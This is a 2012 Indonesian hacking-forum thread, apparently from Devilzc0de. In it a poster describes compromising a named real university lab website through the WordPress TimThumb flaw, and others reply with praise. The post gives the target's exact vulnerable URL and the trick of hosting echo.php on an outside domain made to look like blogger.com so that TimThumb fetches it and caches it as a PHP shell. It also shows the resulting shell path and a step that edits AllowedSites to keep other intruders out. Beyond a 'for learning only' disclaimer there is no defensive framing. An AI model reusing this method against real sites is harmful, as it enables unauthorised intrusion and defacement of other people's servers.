Home General Computer Multimedia Business Lounge
|
Labkom Universitas Budi luhur Thimthumb Vulnaberity
|
|
03-23-2012, 08:43 AM
(This post was last modified: 03-24-2012 12:01 AM by ketem.)
|
|||
|
|||
|
Labkom Universitas Budi luhur Thimthumb Vulnaberity
Intoduction
Sebenernya Ga Mau Publish, Semua Email Adminnya Bouncing jadi publish aja kali yah :) awalnya sich temen ngomong, cong tembusin aja tuch web budiluhur , kata rektornya kal bisa nembus dapet beasiswa sekolah , langsung otak ketem kelayapan, jadi anak kuliahan , banyak cewe pake rok pendek ![]() Testing (asal jangan sekali tetes bunting aja >.<") Pertama Tama Buka dulu webnya ( sebenernya gw udah buka semua web budi luhur cuma belum nemu maklum newbie kelas berat) nah ane tentuin dah tuch targetnya labkom coz banyak yang bilang anak labkom tuch jago jago (studi kasus ane ribut sama wardoyoko xcode mungkin dia udah nembus web ini duluan dan banyak lagi) pertama ane liat dulu source codenya ternyata ada themenya dan itu make wordpress Code: http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress/js/jquery.jsterus ane mikir bugs yang paling anget apan yah nah ane coba thimthumb Code: http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress//scripts/timthumb.php?src=menghasilkan Code: no image specifiedlangsung ane cari shell yang baut thimthumb nanya ke para om sepuh dece dari @[./rex] ,civo ,@[Nanda_23], dll akhirnyda dapet dari om civo ternyata kurang .htaccsess (ane di kasih tau kang tempe_mendoan kurang lebhnya code .htaccsess seperti ini Code: <FilesMatch "tes.php">Code: file htacsessnya di tarod di server yah htp://blogger.com.blablbala itudengan url Code: http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress//scripts/timthumb.php?src=http://blogger.com.sertifikasirayon5.com/echo.phpdapet lah hasil Code: http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress/scripts/cache/b93b05cf280b5910c3960136fe8a258f.phpnah udah masuk yah abis masuk jangan lupa tutup pintu masuk pergi ke file thimthumb.php pada line 27 terdapat code Code: $ AllowedSites = array ('flickr.com', 'picasa.com', 'blogger.com', 'wordpress.com', 'img.youtube.com', 'upload.wikimedia.org',ubah menjadi Code: $ AllowedSites = array ();lalu ane coba lagi aksess Code: http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress//scripts/timthumb.php?src=http://blogger.com.sertifikasirayon5.com/echo.phphasilnya Code: remote host "blogger.com.sertifikasirayon5.com" not allowedDevilzc0de ga pernah nyaranin buat deface web lokal, namun ada beberapa teman yang mungkin kesel ngehubungin adminnya ga ada kontaknya jadi maen pepes aja..kita ga pernah tau saat deface dia lagi gmana (mungkin lagi galau) yang jelas balik lagi Devilzc0de ga pernah nyaranin buat deface web lokal apalagi nyuruh deface web lokal ![]() NB : ARtikel Ini hanya buat belajar ts tidak bertanggung jawab dengan apapun akibat artikel ini |
|||
Reputed by : poticous(+1) , Reborn Of Code(+1) |
|
03-23-2012, 09:06 AM
|
|||
|
|||
|
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
mantap kk
ijin pelajari ia |
|||
|
03-23-2012, 10:11 AM
|
|||
|
|||
|
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
rerem
|
|||
|
03-23-2012, 04:18 PM
|
|||
|
|||
|
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
mantab dahg tutornya bang ..
enak dibaca dan mudah dipahami .. |
|||
|
03-23-2012, 04:32 PM
|
|||
|
|||
|
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
mantap,,,,nice
|
|||
|
03-23-2012, 04:46 PM
|
|||
|
|||
|
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
super sekali om ketem
|
|||
|
03-23-2012, 06:01 PM
|
|||
|
|||
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
ommasih blm ngerti nih om.. ijin belajar dulu
|
|||
|
03-23-2012, 06:17 PM
|
|||
|
|||
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
keren nih
|
|||
|
03-23-2012, 08:10 PM
|
|||
|
|||
|
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
crootss..
![]() shellnya dari workshop kmaren, jadi inget kang peti ama kang jos_ali.. btw keren bang
|
|||
|
03-23-2012, 09:06 PM
|
|||
|
|||
|
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
mantep bray
|
|||
|
« Next Oldest | Next Newest »
|
| Topic Tools | ||||||
| ||||||
| Possibly Related Threads... | |||||
| Thread: | Author | Replies: | Views: | Last Post | |
| Universitas Indonesia Dan Gunadarma | al3x_0wn5 | 14 | 550 |
12-25-2011 11:33 AM Last Post: eidelweiss |
|
| Users Browsing |



![[Image: di-M81G.jpg]](http://sarkem.us/di-M81G.jpg)













